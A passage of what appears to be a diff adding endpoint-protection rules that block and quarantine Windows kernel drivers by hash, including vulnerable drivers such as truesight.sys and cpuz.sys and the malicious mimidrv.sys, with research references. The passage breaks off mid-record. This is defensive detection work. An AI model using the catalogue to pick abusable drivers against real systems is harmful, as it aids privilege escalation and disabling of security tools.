"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473396Z", + "creation_date": "2026-03-23T11:45:30.473399Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473408Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b01ebea651ec7780d0fe88dd1b6c2500a36dacf85e3a4038c2ca1c5cb44c7b5d", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfb58b5d-6f99-53ad-8de0-eb76f2e54ae6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494745Z", + "creation_date": "2026-03-23T11:45:31.494747Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494753Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f05a2cf863c80be0a142bf81fd46e3d8964ff6fad8430cbac63469552179b14", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfbf7a4f-6516-59f7-8992-09226ff8e35a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819865Z", + "creation_date": "2026-03-23T11:45:31.819884Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819893Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe490ce5dee1028d46673a2bafa96952a320b8f9fe988c8fefcf1a1fdcbbcd36", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfc61591-6b9d-5ed1-82e1-20c522b5ba47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:29.981523Z", + "creation_date": "2026-03-23T11:45:29.981526Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dbebf6d463c2dbf61836b3eba09b643e1d79a02652a32482ca58894703b9addb", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfc82f78-9f9b-54af-8eaf-f02d52bcd90f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488708Z", + "creation_date": "2026-03-23T11:45:31.488710Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488715Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7480a9e5a0339f755820432d7e14acfcd6f2d20012bbdd599f67d123b79c3fda", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" 
+} +{ + "id": "dfca525e-287b-5827-b6cb-f83cada3cd32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151705Z", + "creation_date": "2026-03-23T11:45:31.151708Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151716Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ceb3473a819cb39ec750f1ce21c563b49b6df8d973644f758ca979cb96eb2e73", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfcb957e-8f0e-58a2-ae7e-8bca3bc1518d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986178Z", + "creation_date": "2026-03-23T11:45:29.986180Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986185Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3f20ac5dac9171857fc5791865458fdb6eac4fab837d7eabc42cb0a83cb522fc", + "comment": "Vulnerable Kernel Driver (aka pchunter.sys) [https://www.loldrivers.io/drivers/73290fcb-a0d7-481e-81a5-65a9859b50f5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfd5e0c9-88da-588c-b360-f4e513e87f47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465426Z", + "creation_date": "2026-03-23T11:45:30.465429Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465438Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d23ab46ad547e7eef409b40756aae9246fbdf545d13946f770643f19c715e80", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfd8be6c-24f7-570b-8dbb-c48f19b17fa5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140838Z", + "creation_date": "2026-03-23T11:45:31.140840Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140846Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2503a559f90fd20870802a67b241d45e50c4f3be20b569a1c78bfe390ad1c4d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfdaa7a4-b2d6-5fe6-b20e-b5ad61ab82b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612735Z", + "creation_date": "2026-03-23T11:45:29.612737Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612743Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"028aed97e90c5a231069a3fa0853c67ea5853c4bbfea6247c6f4b53509581d05", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfdea1c0-e3ef-5240-a187-8db5ada278af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832586Z", + "creation_date": "2026-03-23T11:45:30.832588Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832594Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "825756750ca654e55536cc9ac53c9c090f943723e1dc88c5d8179f0001eab105", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e013bc0d-6b3d-5666-aecd-ad906f0a9f7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, 
+ "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969802Z", + "creation_date": "2026-03-23T11:45:29.969804Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969809Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "968258fe6b307a7887465c7fb0a0b7b45f973b91deb8638af1428d247430d777", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e01990f0-d241-5db4-8cec-875462735a5b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810521Z", + "creation_date": "2026-03-23T11:45:31.810524Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810529Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "09ed697c9fc0b66ddcb2839b6ba82088d5a9f7ce307ebab83524888606211d10", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e020bb92-1ebe-55bf-8d3b-31e1f949fcfd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142018Z", + "creation_date": "2026-03-23T11:45:31.142020Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142025Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7d896a44696d3bc40219956db058238a269911a053eaf6eb4b43bf28efe1c07d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e022fcc0-e179-51c6-b7ee-2e31eaad95a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477804Z", + "creation_date": 
"2026-03-23T11:45:31.477808Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477861Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fbb597b01dd0323a6f59bf873635662802971080d9fb74b1d5dcfe86ad1d09a7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e02381bc-a11f-5e6a-939d-0389175edc40", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822936Z", + "creation_date": "2026-03-23T11:45:30.822938Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822943Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6208a115fc72bc9014c7debb188c473c41f64e7ffeb3efbd31af6c48c0726702", + "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"e028b319-84c1-57ad-a8fe-9cac6e110c29", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493275Z", + "creation_date": "2026-03-23T11:45:31.493277Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493283Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea1a63aa063f1cd46cccd934fb3a6b5c0cf7e37bc79ca53eb6d5a39eefcfcd6f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e037fa8e-345e-5606-b4b4-6d8fb0925e1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486668Z", + "creation_date": "2026-03-23T11:45:31.486671Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.486679Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "12060b757db0d78a2c6603930b6b08e79a90937f5e7d81ea0086b86fb0155fb9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e03dafb0-5ec0-5688-950d-1252cd95a83c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160666Z", + "creation_date": "2026-03-23T11:45:31.160668Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160674Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b52289bc4c5ce08fa3d1ab31d0c74c86564a39415cd55178e859d79b8f16117", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e03db9f2-a2d3-5028-98d0-bcd97c55374b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822736Z", + "creation_date": "2026-03-23T11:45:31.822739Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822746Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42d9b12949e06581c571488e2ff0725cf8d871f7405cab958e43c1bc71867a12", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e040864e-2a64-5391-8d15-aec54a1385b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500735Z", + "creation_date": "2026-03-23T11:45:31.500738Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500746Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a54b5b088967e6f65f37cf67c88e67c96a95487024d57cf39993b356898e5c45", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0468411-5a02-5b72-8e45-12f2ea534bde", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604129Z", + "creation_date": "2026-03-23T11:45:29.604131Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c29e726448ad3e6452b5d186afb4668e6fcc942be512fe25ed72cfa1b73a6007", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0505e7d-9e80-58f4-8cb0-ea6878de642b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622668Z", + "creation_date": "2026-03-23T11:45:29.622670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622676Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "94be67c319a67de75ebed050d5537cfaa795d72bba52f3d8cf349e7bd075410e", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e054a1e8-3565-5de2-aa8c-90effc3edca5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620981Z", + "creation_date": "2026-03-23T11:45:29.620983Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620989Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414", + "comment": "Phoenix Technologies Vulnerable Physmem 
drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e0790e85-36bc-5afa-8d7a-8be260cfb549", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826138Z", + "creation_date": "2026-03-23T11:45:31.826140Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826146Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 